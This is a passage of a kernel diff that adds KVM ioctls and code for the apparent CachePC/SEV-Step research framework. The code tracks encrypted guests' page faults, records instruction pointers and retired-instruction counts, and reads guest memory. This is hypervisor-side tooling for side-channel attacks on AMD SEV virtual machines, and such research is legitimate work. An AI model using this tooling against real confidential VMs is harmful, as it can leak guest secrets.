_IOWR(CACHEPC_IOCTL_MAGIC, 1, __u32) #define CACHEPC_IOCTL_INIT_PMC _IOW(CACHEPC_IOCTL_MAGIC, 2, __u32) + +#define KVM_TRACK_PAGE _IOWR(KVMIO, 0x20, track_page_param_t) +#define KVM_USPT_REGISTER_PID _IOWR(KVMIO, 0x21, userspace_ctx_t) +#define KVM_USPT_WAIT_AND_SEND _IO(KVMIO, 0x22) +#define KVM_USPT_POLL_EVENT _IOWR(KVMIO, 0x23, page_fault_event_t) +#define KVM_USPT_ACK_EVENT _IOWR(KVMIO, 0x24, ack_event_t) +#define KVM_READ_GUEST_MEMORY _IOWR(KVMIO, 0x25, read_guest_memory_t) +#define KVM_USPT_RESET _IO(KVMIO, 0x26) +#define KVM_USPT_TRACK_ALL _IOWR(KVMIO, 0x27, track_all_pages_t) +#define KVM_USPT_UNTRACK_ALL _IOWR(KVMIO, 0x28, track_all_pages_t) +#define KVM_USPT_SETUP_RETINSTR_PERF _IOWR(KVMIO, 0x30, retired_instr_perf_config_t) +#define KVM_USPT_READ_RETINSTR_PERF _IOWR(KVMIO, 0x31, retired_instr_perf_t) +#define KVM_USPT_BATCH_TRACK_START _IOWR(KVMIO, 0x32, batch_track_config_t) +#define KVM_USPT_BATCH_TRACK_STOP _IOWR(KVMIO, 0x33, batch_track_stop_and_get_t) +#define KVM_USPT_BATCH_TRACK_EVENT_COUNT _IOWR(KVMIO, 0x34, batch_track_event_count_t) + +#define KVM_USPT_POLL_EVENT_NO_EVENT 1000 +#define KVM_USPT_POLL_EVENT_GOT_EVENT 0 + +enum kvm_page_track_mode { + KVM_PAGE_TRACK_WRITE, + KVM_PAGE_TRACK_ACCESS, + KVM_PAGE_TRACK_RESET_ACCESSED, + KVM_PAGE_TRACK_EXEC, + KVM_PAGE_TRACK_RESET_EXEC, + KVM_PAGE_TRACK_MAX, +}; + +typedef struct { + __u64 id; // filled automatically + __u64 faulted_gpa; + __u32 error_code; + __u8 have_rip_info; + __u64 rip; + __u64 ns_timestamp; + __u8 have_retired_instructions; + __u64 retired_instructions; +} page_fault_event_t; + +typedef struct { + __s32 tracking_type; + __u64 expected_events; + __s32 perf_cpu; + __u8 retrack; +} batch_track_config_t; + +typedef struct { + __u64 event_count; +} batch_track_event_count_t; + +typedef struct { + page_fault_event_t* out_buf; + __u64 len; + __u8 error_during_batch; +} batch_track_stop_and_get_t; + +typedef struct { + __s32 cpu; // cpu on which we want to read the counter + __u64 retired_instruction_count; // result param +} retired_instr_perf_t; + +typedef struct { + __s32 cpu; // cpu on which counter should be programmed +} retired_instr_perf_config_t; + +typedef struct { + __u64 gpa; + __u64 len; + __u8 decrypt_with_host_key; + __s32 wbinvd_cpu; // -1: do not flush; else logical cpu on which we flush + void *output_buffer; +} read_guest_memory_t; + +typedef struct { + __s32 pid; + __u8 get_rip; +} userspace_ctx_t; + +typedef struct { + __u64 id; +} ack_event_t; + +typedef struct { + __u64 gpa; + __s32 track_mode; +} track_page_param_t; + +typedef struct { + __s32 
track_mode; +} track_all_pages_t; + diff --git a/cachepc/uspt.c b/cachepc/uspt.c @@ -0,0 +1,488 @@ +#include "uspt.h" +#include "sevstep.h" +#include "cachepc.h" + +#include <linux/kvm.h> +#include <linux/timekeeping.h> +#include <linux/uaccess.h> +#include <linux/types.h> +#include <linux/vmalloc.h> +#include <linux/printk.h> +#include <linux/ratelimit.h> + +#define ARRLEN(x) (sizeof(x)/sizeof((x)[0])) + +typedef struct { + bool is_active; + int tracking_type; + bool retrack; + + int perf_cpu; + + uint64_t gfn_retrack_backlog[10]; + int gfn_retrack_backlog_next_idx; + + page_fault_event_t * events; + uint64_t event_next_idx; + uint64_t events_size; + + bool error_occured; +} batch_track_state_t; + +typedef struct { + uint64_t idx_for_last_perf_reading; + uint64_t last_perf_reading; + uint64_t delta_valid_idx; + uint64_t delta; +} perf_state_t; + +// crude sync mechanism. don't know a good way to act on errors yet. +static uint64_t last_sent_event_id = 1; +static uint64_t last_acked_event_id = 1; +DEFINE_RWLOCK(event_lock); + +static page_fault_event_t sent_event; +static int have_event = 0; + +static bool get_rip = true; + +static int inited = 0; + +DEFINE_SPINLOCK(batch_track_state_lock); +static batch_track_state_t batch_track_state; + +static perf_state_t perf_state; + +static uint64_t perf_state_update_and_get_delta(uint64_t current_event_idx); + +void +sevstep_uspt_clear(void) +{ + write_lock(&event_lock); + inited = 0; + last_sent_event_id = 1; + last_acked_event_id = 1; + have_event = 0; + get_rip = false; + write_unlock(&event_lock); +} + +int +sevstep_uspt_initialize(int pid, bool should_get_rip) +{ + write_lock(&event_lock); + inited = 1; + last_sent_event_id = 1; + last_acked_event_id = 1; + have_event = 0; + get_rip = should_get_rip; + write_unlock(&event_lock); + + return 0; +} + +int +sevstep_uspt_is_initialiized() +{ + return inited; +} + +bool +sevstep_uspt_should_get_rip() +{ + bool tmp; + + read_lock(&event_lock); + tmp = get_rip; + read_unlock(&event_lock); + + return tmp; +} + +int +sevstep_uspt_send_and_block(uint64_t faulted_gpa, uint32_t error_code, + bool have_rip, uint64_t rip) +{ + ktime_t abort_after; + page_fault_event_t message_for_user; + + read_lock(&event_lock); + if (!sevstep_uspt_is_initialiized()) { + pr_warn("sevstep_uspt_send_and_block: ctx not initialized!\n"); + read_unlock(&event_lock); + return 1; + } + read_unlock(&event_lock); + + write_lock(&event_lock); + if (last_sent_event_id != last_acked_event_id) { + pr_warn("sevstep_uspt_send_and_block: " + "event id_s out of sync, aborting. Fix this later\n"); + write_unlock(&event_lock); + return 1; + } else { + // TODO: handle overflow + last_sent_event_id++; + } + message_for_user.id = last_sent_event_id; + message_for_user.faulted_gpa = faulted_gpa; + message_for_user.error_code = error_code; + message_for_user.have_rip_info = have_rip; + message_for_user.rip = rip; + message_for_user.ns_timestamp = ktime_get_real_ns(); + message_for_user.have_retired_instructions = false; + + // for poll based system; + have_event = 1; + sent_event = message_for_user; + // printk("sevstep_uspt_send_and_block sending event %llu\n", sent_event.id); + + write_unlock(&event_lock); + + // wait for ack, but with timeout. 
Otherwise small bugs in userland + // easily lead to a kernel hang + abort_after = ktime_get() + 1000000000ULL; // 1 sec in nanosecond + while (!sevstep_uspt_is_event_done(sent_event.id)) { + if (ktime_get() > abort_after) { + pr_warn("sevstep_uspt_send_and_block: " + "Waiting for ack of event %llu timed out, " + "continuing\n",sent_event.id); + return 3; + } + } + + return 0; +} + +int +sevstep_uspt_is_event_done(uint64_t id) +{ + int res; + + read_lock(&event_lock); + res = last_acked_event_id >= id; + read_unlock(&event_lock); + + return res; +} + +int +sevstep_uspt_handle_poll_event(page_fault_event_t* userpace_mem) +{ + int err; + + // most of the time we won't have an event + read_lock(&event_lock); + if (!have_event) { + read_unlock(&event_lock); + return KVM_USPT_POLL_EVENT_NO_EVENT; + } + read_unlock(&event_lock); + + write_lock(&event_lock); + if (have_event) { + err = copy_to_user(userpace_mem, + &sent_event, sizeof(page_fault_event_t)); + have_event = 0; + } else { + err = KVM_USPT_POLL_EVENT_NO_EVENT; + } + write_unlock(&event_lock); + + return err; +} + +int +sevstep_uspt_handle_ack_event_ioctl(ack_event_t event) +{ + int err = 0; + + write_lock(&event_lock); + if (event.id == last_sent_event_id) { + last_acked_event_id = last_sent_event_id; + } else { + err = 1; + pr_warn("sevstep_uspt_handle_ack_event_ioctl: " + "last sent event id is %llu but received ack for %llu\n", + last_sent_event_id, event.id); + } + write_unlock(&event_lock); + + return err; +} + +// get retired instructions between current_event_idx-1 and current_event_idx +// value is cached for multiple calls to the same current_event_idx +uint64_t +perf_state_update_and_get_delta(uint64_t current_event_idx) +{ + uint64_t current_value; + + /* check if value is "cached" */ + if (perf_state.delta_valid_idx == current_event_idx) { + if (current_event_idx == 0) { + perf_state.idx_for_last_perf_reading = current_event_idx; + perf_state.last_perf_reading = cachepc_read_pmc(0); + } + return perf_state.delta; + } + + /* otherwise update, but logic is only valid for two consecutive events */ + if (current_event_idx != perf_state.idx_for_last_perf_reading+1) { + pr_warn("perf_state_update_and_get_delta: " + "last reading was for idx %llu but was queried for %llu\n", + perf_state.idx_for_last_perf_reading, current_event_idx); + } + + current_value = cachepc_read_pmc(0); + perf_state.delta = (current_value - perf_state.last_perf_reading); + perf_state.delta_valid_idx = current_event_idx; + + perf_state.idx_for_last_perf_reading = current_event_idx; + perf_state.last_perf_reading = current_value; + + return perf_state.delta; +} + +void +sevstep_uspt_batch_tracking_inc_event_idx(void) +{ + spin_lock(&batch_track_state_lock); + batch_track_state.event_next_idx++; + spin_unlock(&batch_track_state_lock); +} + +int +sevstep_uspt_batch_tracking_start(int tracking_type,uint64_t expected_events, + int perf_cpu, bool retrack) +{ + page_fault_event_t* events; + uint64_t buffer_size, i; + + spin_lock(&batch_track_state_lock); + if (batch_track_state.is_active) { + pr_warn("sevstep_uspt_batch_tracking_start: " + "overwriting active batch track config!\n"); + if (batch_track_state.events != NULL ) { + vfree(batch_track_state.events); + } + } + batch_track_state.is_active = false; + spin_unlock(&batch_track_state_lock); + + buffer_size = expected_events * sizeof(page_fault_event_t); + pr_warn("sevstep_uspt_batch_tracking_start: " + "trying to alloc %llu bytes buffer for events\n", + buffer_size); + events = vmalloc(buffer_size); + if 
(events == NULL) { + pr_warn("sevstep_uspt_batch_tracking_start: " + "faperf_cpuiled to alloc %llu bytes for event buffer\n", + buffer_size); + return 1; // note: lock not held here + } + + // access each element once to force them into memory, improving performance + // during tracking + for (i = 0; i < expected_events * sizeof(page_fault_event_t); i++) { + ((volatile uint8_t*)events)[i] = 0; + } + + perf_state.idx_for_last_perf_reading = 0; + perf_state.last_perf_reading = 0; + perf_state.delta_valid_idx = 0; + perf_state.delta = 0; + cachepc_init_pmc(0, 0xc0, 0x00, PMC_GUEST, PMC_KERNEL | PMC_USER); + + spin_lock(&batch_track_state_lock); + + batch_track_state.perf_cpu = perf_cpu; + batch_track_state.retrack = retrack; + + batch_track_state.events = events; + batch_track_state.event_next_idx = 0; + batch_track_state.events_size = expected_events; + + batch_track_state.gfn_retrack_backlog_next_idx = 0; + batch_track_state.tracking_type = tracking_type; + batch_track_state.error_occured = false; + + batch_track_state.is_active = true; + + spin_unlock(&batch_track_state_lock); + + return 0; +} + +void +sevstep_uspt_batch_tracking_handle_retrack(struct kvm_vcpu* vcpu, + uint64_t current_fault_gfn) +{ + uint64_t ret_instr_delta; + int i, next_idx; + + spin_lock(&batch_track_state_lock); + + if (!batch_track_state.retrack) { + spin_unlock(&batch_track_state_lock); + return; + } + + if (smp_processor_id() != batch_track_state.perf_cpu) { + pr_warn("sevstep_uspt_batch_tracking_handle_retrack: perf was " + "programmed on logical cpu %d but handler was called " + "on %d. Did you forget to pin the vcpu thread?\n", + batch_track_state.perf_cpu, smp_processor_id()); + } + ret_instr_delta = perf_state_update_and_get_delta(batch_track_state.event_next_idx); + + // faulting instructions is probably the same as on last fault + // try to add current fault to retrack log and return + // for first event idx we do not have a valid ret_instr_delta. 
+ // Retracking for the frist time is fine, if we loop, we end up here + // again but with a valid delta on one of the next event + if ((ret_instr_delta < 2) && ( batch_track_state.event_next_idx != 0)) { + next_idx = batch_track_state.gfn_retrack_backlog_next_idx; + if (next_idx >= ARRLEN(batch_track_state.gfn_retrack_backlog)) { + pr_warn("sevstep_uspt_batch_tracking_handle_retrack: " + "retrack backlog full, dropping retrack for fault " + "at 0x%llx\n", current_fault_gfn); + } else { + batch_track_state.gfn_retrack_backlog[next_idx] = current_fault_gfn; + batch_track_state.gfn_retrack_backlog_next_idx++; + } + + spin_unlock(&batch_track_state_lock); + return; + } + + /* made progress, retrack everything in backlog and reset idx */ + for (i = 0; i < batch_track_state.gfn_retrack_backlog_next_idx; i++) { + sevstep_track_single_page(vcpu, + batch_track_state.gfn_retrack_backlog[i], + batch_track_state.tracking_type); + } + + /* add current fault to list */ + batch_track_state.gfn_retrack_backlog[0] = current_fault_gfn; + batch_track_state.gfn_retrack_backlog_next_idx = 1; + + spin_unlock(&batch_track_state_lock); + +} + +int +sevstep_uspt_batch_tracking_save(uint64_t faulted_gpa, uint32_t error_code, + bool have_rip, uint64_t rip) +{ + uint64_t ret_instr_delta; + page_fault_event_t* event; + + spin_lock(&batch_track_state_lock); + + if (!batch_track_state.is_active) { + pr_warn("sevstep_uspt_batch_tracking_save: " + "got save but batch tracking is not active!\n"); + batch_track_state.error_occured = true; + spin_unlock(&batch_track_state_lock); + return 1; + } + + + if (batch_track_state.event_next_idx >= batch_track_state.events_size) { + pr_warn("sevstep_uspt_batch_tracking_save: events buffer is full!\n"); + batch_track_state.error_occured = true; + spin_unlock(&batch_track_state_lock); + return 1; + } + + if (smp_processor_id() != batch_track_state.perf_cpu) { + pr_warn("sevstep_uspt_batch_tracking_save: perf was " + "programmed on logical cpu %d but handler was called " + "on %d. Did you forget to pin the vcpu thread?\n", + batch_track_state.perf_cpu, smp_processor_id()); + } + ret_instr_delta = perf_state_update_and_get_delta(batch_track_state.event_next_idx); + + + if (batch_track_state.events == NULL) { + pr_warn("sevstep_uspt_batch_tracking_save: events buf was " + "NULL but \"is_active\" was set! 
This should never happen!!!\n"); + spin_unlock(&batch_track_state_lock); + return 1; + } + + event = &batch_track_state.events[batch_track_state.event_next_idx]; + event->id = batch_track_state.event_next_idx; + event->faulted_gpa = faulted_gpa; + event->error_code = error_code; + event->have_rip_info = have_rip; + event->rip = rip; + event->ns_timestamp = ktime_get_real_ns(); + event->have_retired_instructions = true; + event->retired_instructions = ret_instr_delta; + + // old inc was here + + if (batch_track_state.gfn_retrack_backlog_next_idx + > ARRLEN(batch_track_state.gfn_retrack_backlog)) { + pr_warn("sevstep_uspt_batch_tracking_save: " + "gfn retrack backlog overflow!\n"); + batch_track_state.error_occured = true; + spin_unlock(&batch_track_state_lock); + return 1; + } + + spin_unlock(&batch_track_state_lock); + + return 0; +} + +int +sevstep_uspt_batch_tracking_stop(page_fault_event_t* results, + uint64_t len, __u8* error_occured) +{ + spin_lock(&batch_track_state_lock); + if (!batch_track_state.is_active) { + pr_warn("sevstep_uspt: batch tracking not active\n"); + spin_unlock(&batch_track_state_lock); + return 1; + + } + batch_track_state.is_active = false; + + if (len > batch_track_state.event_next_idx) { + pr_warn("sevstep_uspt_batch_tracking_stop: " + "requested %llu events but got only %llu\n", + len, batch_track_state.event_next_idx); + spin_unlock(&batch_track_state_lock); + return 1; + } + + memcpy(results,batch_track_state.events, len*sizeof(page_fault_event_t)); + vfree(batch_track_state.events); + + *error_occured = batch_track_state.error_occured; + + spin_unlock(&batch_track_state_lock); + + return 0; +} + +uint64_t +sevstep_uspt_batch_tracking_get_events_count() +{ + uint64_t buf; + + spin_lock(&batch_track_state_lock); + buf = batch_track_state.event_next_idx; + spin_unlock(&batch_track_state_lock); + + return buf; +} + +bool +sevstep_uspt_batch_tracking_in_progress() +{ + return batch_track_state.is_active; +} diff --git a/sevstep/uspt.h b/cachepc/uspt.h diff --git a/patch.diff b/patch.diff @@ -1,5 +1,5 @@ diff --git a/arch/x86/include/asm/kvm_page_track.h b/arch/x86/include/asm/kvm_page_track.h -index eb186bc57f6a..3f767a27045e 100644 +index eb186bc57f6a..b96e80934005 100644 --- a/arch/x86/include/asm/kvm_page_track.h +++ b/arch/x86/include/asm/kvm_page_track.h @@ -2,10 +2,9 @@ @@ -12,12 +12,12 @@ index eb186bc57f6a..3f767a27045e 100644 -}; +#include<linux/srcu.h> + -+#include "../../kvm/sevstep/uapi.h" ++#include "../../kvm/cachepc/uapi.h" /* * The notifier represented by @kvm_page_track_notifier_node is linked into diff --git a/arch/x86/kvm/Makefile b/arch/x86/kvm/Makefile -index 30f244b64523..3c5f65040878 100644 +index 30f244b64523..e0eeffd340e8 100644 --- a/arch/x86/kvm/Makefile +++ b/arch/x86/kvm/Makefile @@ -1,6 +1,6 @@ @@ -35,8 +35,8 @@ index 30f244b64523..3c5f65040878 100644 - hyperv.o debugfs.o mmu/mmu.o mmu/page_track.o \ - mmu/spte.o + hyperv.o debugfs.o mmu/mmu.o mmu/page_track.o mmu/spte.o \ -+ svm/cachepc/cachepc.o svm/cachepc/kvm.o \ -+ sevstep/sevstep.o sevstep/uspt.o ++ cachepc/cachepc.o cachepc/kvm.o \ ++ cachepc/sevstep.o cachepc/uspt.o ifdef CONFIG_HYPERV kvm-y += kvm_onhyperv.o @@ -45,20 +45,20 @@ index 30f244b64523..3c5f65040878 100644 kvm-intel-$(CONFIG_X86_SGX_KVM) += vmx/sgx.o -kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o svm/avic.o svm/sev.o -+kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o svm/avic.o svm/sev.o \ -+ svm/cachepc/cachepc.o ++kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o \ ++ 
svm/avic.o svm/sev.o cachepc/cachepc.o ifdef CONFIG_HYPERV kvm-amd-y += svm/svm_onhyperv.o diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c -index d871b8dee7b3..32900ef5ee0b 100644 +index d871b8dee7b3..3b7720aebbc6 100644 --- a/arch/x86/kvm/mmu/mmu.c +++ b/arch/x86/kvm/mmu/mmu.c @@ -1152,6 +1152,8 @@ static void drop_large_spte(struct kvm_vcpu *vcpu, u64 *sptep) } } -+#include "../sevstep/mmu.c" ++#include "../cachepc/mmu.c" + /* * Write-protect on the specified @sptep, @pt_protect indicates whether @@ -154,14 +154,14 @@ index d871b8dee7b3..32900ef5ee0b 100644 return false; } diff --git a/arch/x86/kvm/mmu/page_track.c b/arch/x86/kvm/mmu/page_track.c -index 2e09d1b6249f..17b69a1f2b40 100644 +index 2e09d1b6249f..9b40e71564bf 100644 --- a/arch/x86/kvm/mmu/page_track.c +++ b/arch/x86/kvm/mmu/page_track.c @@ -19,6 +19,8 @@ #include "mmu.h" #include "mmu_internal.h" -+#include "../sevstep/sevstep.h" ++#include "../cachepc/sevstep.h" + bool kvm_page_track_write_tracking_enabled(struct kvm *kvm) { @@ -180,22 +180,6 @@ index 2e09d1b6249f..17b69a1f2b40 100644 } EXPORT_SYMBOL_GPL(kvm_slot_page_track_add_page); -diff --git a/arch/x86/kvm/sevstep b/arch/x86/kvm/sevstep -new file mode 120000 -index 000000000000..642ea24bf098 ---- /dev/null -+++ b/arch/x86/kvm/sevstep -@@ -0,0 +1 @@ -+/home/louis/kvm-prime-count/sevstep -\ No newline at end of file -diff --git a/arch/x86/kvm/svm/cachepc b/arch/x86/kvm/svm/cachepc -new file mode 120000 -index 000000000000..9119e44af1f0 ---- /dev/null -+++ b/arch/x86/kvm/svm/cachepc -@@ -0,0 +1 @@ -+/home/louis/kvm-prime-count/cachepc -\ No newline at end of file diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c index cf0bf456d520..4dbb8041541f 100644 --- a/arch/x86/kvm/svm/svm.c @@ -382,14 +366,14 @@ index dfaeb47fcf2a..0626f3fdddfd 100644 2: cli diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c -index d9adf79124f9..082dc8553566 100644 +index d9adf79124f9..3e5c55f9bef0 100644 --- a/arch/x86/kvm/x86.c +++ b/arch/x86/kvm/x86.c @@ -82,6 +82,8 @@ #include <asm/sgx.h> #include <clocksource/hyperv_timer.h> -+#include "sevstep/sevstep.h" ++#include "cachepc/sevstep.h" + #define CREATE_TRACE_POINTS #include "trace.h" @@ -427,21 +411,29 @@ index e089fbf9017f..7899e1efe852 static int __sev_init_locked(int *error) { diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c -index f2a63cb2658b..bd26b7a29c9e 100644 +index f2a63cb2658b..0d1c1d8c72ea 100644 --- a/virt/kvm/kvm_main.c +++ b/virt/kvm/kvm_main.c -@@ -70,6 +70,10 @@ +@@ -13,6 +13,7 @@ + * Yaniv Kamay <yaniv@qumranet.com> + */ + ++#include <asm-generic/errno-base.h> + #include <kvm/iodev.h> + + #include <linux/kvm_host.h> +@@ -70,6 +71,10 @@ /* Worst case buffer size needed for holding an integer. 
*/ #define ITOA_MAX_LEN 12 -+#include "../../arch/x86/kvm/svm/cachepc/kvm.h" -+#include "../../arch/x86/kvm/sevstep/sevstep.h" -+#include "../../arch/x86/kvm/sevstep/uspt.h" ++#include "../../arch/x86/kvm/cachepc/kvm.h" ++#include "../../arch/x86/kvm/cachepc/sevstep.h" ++#include "../../arch/x86/kvm/cachepc/uspt.h" + MODULE_AUTHOR("Qumranet"); MODULE_LICENSE("GPL"); -@@ -159,6 +163,267 @@ static unsigned long long kvm_active_vms; +@@ -159,6 +164,267 @@ static unsigned long long kvm_active_vms; static DEFINE_PER_CPU(cpumask_var_t, cpu_kick_mask); @@ -709,7 +701,7 @@ index f2a63cb2658b..bd26b7a29c9e 100644 __weak void kvm_arch_mmu_notifier_invalidate_range(struct kvm *kvm, unsigned long start, unsigned long end) { -@@ -1261,6 +1526,9 @@ static void kvm_destroy_vm(struct kvm *kvm) +@@ -1261,6 +1527,9 @@ static void kvm_destroy_vm(struct kvm *kvm) hardware_disable_all(); mmdrop(mm); module_put(kvm_chardev_ops.owner); @@ -719,7 +711,7 @@ index f2a63cb2658b..bd26b7a29c9e 100644 } void kvm_get_kvm(struct kvm *kvm) -@@ -1360,7 +1628,7 @@ static void kvm_insert_gfn_node(struct kvm_memslots *slots, +@@ -1360,7 +1629,7 @@ static void kvm_insert_gfn_node(struct kvm_memslots *slots, int idx = slots->node_idx; parent = NULL; @@ -728,7 +720,7 @@ index f2a63cb2658b..bd26b7a29c9e 100644 struct kvm_memory_slot *tmp; tmp = container_of(*node, struct kvm_memory_slot, gfn_node[idx]); -@@ -4823,6 +5091,9 @@ static int kvm_dev_ioctl_create_vm(unsigned long type) +@@ -4823,6 +5092,9 @@ static int kvm_dev_ioctl_create_vm(unsigned long type) kvm_uevent_notify_change(KVM_EVENT_CREATE_VM, kvm); fd_install(r, file); @@ -738,7 +730,7 @@ index f2a63cb2658b..bd26b7a29c9e 100644 return r; put_kvm: -@@ -4836,6 +5107,315 @@ static long kvm_dev_ioctl(struct file *filp, +@@ -4836,6 +5108,315 @@ static long kvm_dev_ioctl(struct file *filp, long r = -EINVAL; switch (ioctl) { @@ -1054,7 +1046,18 @@ index f2a63cb2658b..bd26b7a29c9e 100644 case KVM_GET_API_VERSION: if (arg) goto out; -@@ -5792,6 +6372,8 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align, +@@ -4864,7 +5445,9 @@ static long kvm_dev_ioctl(struct file *filp, + r = -EOPNOTSUPP; + break; + default: +- return kvm_arch_dev_ioctl(filp, ioctl, arg); ++ //r = cachepc_kvm_ioctl(filp, ioctl, arg); ++ //if (r == -EINVAL) ++ return kvm_arch_dev_ioctl(filp, ioctl, arg); + } + out: + return r; +@@ -5792,6 +6375,8 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align, r = kvm_vfio_ops_init(); WARN_ON(r); @@ -1063,7 +1066,7 @@ index f2a63cb2658b..bd26b7a29c9e 100644 return 0; out_unreg: -@@ -5821,6 +6403,8 @@ void kvm_exit(void) +@@ -5821,6 +6406,8 @@ void kvm_exit(void) { int cpu; diff --git a/sevstep/mmu.c b/sevstep/mmu.c @@ -1,135 +0,0 @@ -#include "../sevstep/sevstep.h" -#include "../sevstep/uspt.h" - -static void -sevstep_uspt_page_fault_handle(struct kvm_vcpu *vcpu, - struct kvm_page_fault *fault) -{ - const int modes[] = { - KVM_PAGE_TRACK_WRITE, - KVM_PAGE_TRACK_ACCESS, - KVM_PAGE_TRACK_EXEC - }; - uint64_t current_rip; - bool was_tracked; - int have_rip, i; - int send_err; - - was_tracked = false; - for (i = 0; i < sizeof(modes) / sizeof(modes[0]); i++) { - if (kvm_slot_page_track_is_active(vcpu->kvm, - fault->slot, fault->gfn, modes[i])) { - sevstep_untrack_single_page(vcpu, fault->gfn, modes[i]); - was_tracked = true; - } - } - - if (was_tracked) { - have_rip = false; - if (sevstep_uspt_should_get_rip()) - have_rip = sevstep_get_rip_kvm_vcpu(vcpu, &current_rip) == 0; - if (sevstep_uspt_batch_tracking_in_progress()) { - send_err = 
sevstep_uspt_batch_tracking_save(fault->gfn << PAGE_SHIFT, - fault->error_code, have_rip, current_rip); - if (send_err) { - printk_ratelimited( - "sevstep_uspt_batch_tracking_save failed with %d\n" - "##########################\n", send_err); - } - sevstep_uspt_batch_tracking_handle_retrack(vcpu, fault->gfn); - sevstep_uspt_batch_tracking_inc_event_idx(); - } else { - send_err = sevstep_uspt_send_and_block(fault->gfn << PAGE_SHIFT, - fault->error_code, have_rip, current_rip); - if (send_err) { - printk("sevstep_uspt_send_and_block failed with %d\n" - "##########################\n", send_err); - } - } - } -} - -bool -sevstep_spte_protect(u64 *sptep, bool pt_protect, enum kvm_page_track_mode mode) -{ - u64 spte; - bool flush; - - spte = *sptep; - if (!is_writable_pte(spte) && !(pt_protect && is_mmu_writable_spte(spte))) - return false; - - rmap_printk("spte %p %llx\n", sptep, *sptep); - - if (pt_protect) - spte &= ~EPT_SPTE_MMU_WRITABLE; - - flush = false; - if (mode == KVM_PAGE_TRACK_WRITE) { - spte = spte & ~PT_WRITABLE_MASK; - flush = true; - } else if (mode == KVM_PAGE_TRACK_RESET_ACCESSED) { - spte = spte & ~PT_ACCESSED_MASK; - } else if (mode == KVM_PAGE_TRACK_ACCESS) { - spte = spte & ~PT_PRESENT_MASK; - spte = spte & ~PT_WRITABLE_MASK; - spte = spte & ~PT_USER_MASK; - spte = spte | (0x1ULL << PT64_NX_SHIFT); - flush = true; - } else if (mode == KVM_PAGE_TRACK_EXEC) { - spte = spte | (0x1ULL << PT64_NX_SHIFT); - flush = true; - } else if (mode == KVM_PAGE_TRACK_RESET_EXEC) { - spte = spte & ~(0x1ULL << PT64_NX_SHIFT); - flush = true; - } else { - printk(KERN_WARNING "spte_protect was called with invalid mode" - "parameter %d\n",mode); - } - flush |= mmu_spte_update(sptep, spte); - - return flush; -} -EXPORT_SYMBOL(sevstep_spte_protect); - -bool sevstep_rmap_protect(struct kvm_rmap_head *rmap_head, - bool pt_protect, enum kvm_page_track_mode mode) -{ - u64 *sptep; - struct rmap_iterator iter; - bool flush = false; - - for_each_rmap_spte(rmap_head, &iter, sptep) { - flush |= sevstep_spte_protect(sptep, pt_protect, mode); - } - - return flush; -} -EXPORT_SYMBOL(sevstep_rmap_protect); - -bool -sevstep_kvm_mmu_slot_gfn_protect(struct kvm *kvm, struct kvm_memory_slot *slot, - uint64_t gfn, int min_level, enum kvm_page_track_mode mode) -{ - struct kvm_rmap_head *rmap_head; - bool protected; - int i; - - protected = false; - - if (kvm_memslots_have_rmaps(kvm)) { - for (i = min_level; i <= KVM_MAX_HUGEPAGE_LEVEL; ++i) { - rmap_head = gfn_to_rmap(gfn, i, slot); - protected |= sevstep_rmap_protect(rmap_head, true, mode); - } - } - - if (is_tdp_mmu_enabled(kvm)) { - protected |= kvm_tdp_mmu_write_protect_gfn(kvm, - slot, gfn, min_level); - } - - return protected; -} -EXPORT_SYMBOL(sevstep_kvm_mmu_slot_gfn_protect); - diff --git a/sevstep/sevstep.c b/sevstep/sevstep.c @@ -1,263 +0,0 @@ -#include "sevstep.h" -#include "svm/cachepc/cachepc.h" - -#include "mmu/mmu_internal.h" -#include "mmu.h" - -#include "irq.h" -#include "ioapic.h" -#include "mmu.h" -#include "mmu/tdp_mmu.h" -#include "x86.h" -#include "kvm_cache_regs.h" -#include "kvm_emulate.h" -#include "cpuid.h" -#include "mmu/spte.h" - -#include <linux/kvm_host.h> -#include <linux/types.h> -#include <linux/string.h> -#include <linux/mm.h> -#include <linux/highmem.h> -#include <linux/moduleparam.h> -#include <linux/export.h> -#include <linux/swap.h> -#include <linux/hugetlb.h> -#include <linux/compiler.h> -#include <linux/srcu.h> -#include <linux/slab.h> -#include <linux/sched/signal.h> -#include <linux/uaccess.h> -#include <linux/hash.h> 
-#include <linux/kern_levels.h> -#include <linux/kthread.h> -#include <linux/sev.h> -#include <linux/mm.h> -#include <linux/smp.h> -#include <linux/vmalloc.h> -#include <linux/slab.h> -#include <linux/sched.h> - -#include "kvm_cache_regs.h" -#include "svm/svm.h" - -struct kvm* main_vm; -EXPORT_SYMBOL(main_vm); - -bool -sevstep_track_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, - enum kvm_page_track_mode mode) -{ - int idx; - bool ret; - struct kvm_memory_slot *slot; - - ret = false; - idx = srcu_read_lock(&vcpu->kvm->srcu); - - if (mode == KVM_PAGE_TRACK_ACCESS) { - pr_warn("Adding gfn: %016llx to access page track pool\n", gfn); - } - - if (mode == KVM_PAGE_TRACK_WRITE) { - pr_warn("Adding gfn: %016llx to write page track pool\n", gfn); - } - - slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); - if (slot != NULL && !kvm_slot_page_track_is_active(vcpu->kvm,slot, gfn, mode)) { - write_lock(&vcpu->kvm->mmu_lock); - kvm_slot_page_track_add_page(vcpu->kvm, slot, gfn, mode); - write_unlock(&vcpu->kvm->mmu_lock); - ret = true; - } else { - pr_warn("Failed to track %016llx because ", gfn); - if (slot == NULL) { - printk(KERN_CONT "slot was null"); - } - if (kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { - printk(KERN_CONT "page is already tracked"); - } - printk(KERN_CONT "\n"); - } - - srcu_read_unlock(&vcpu->kvm->srcu, idx); - - return ret; -} -EXPORT_SYMBOL(sevstep_track_single_page); - -bool -sevstep_untrack_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, - enum kvm_page_track_mode mode) -{ - int idx; - bool ret; - struct kvm_memory_slot *slot; - - ret = false; - idx = srcu_read_lock(&vcpu->kvm->srcu); - - if (mode == 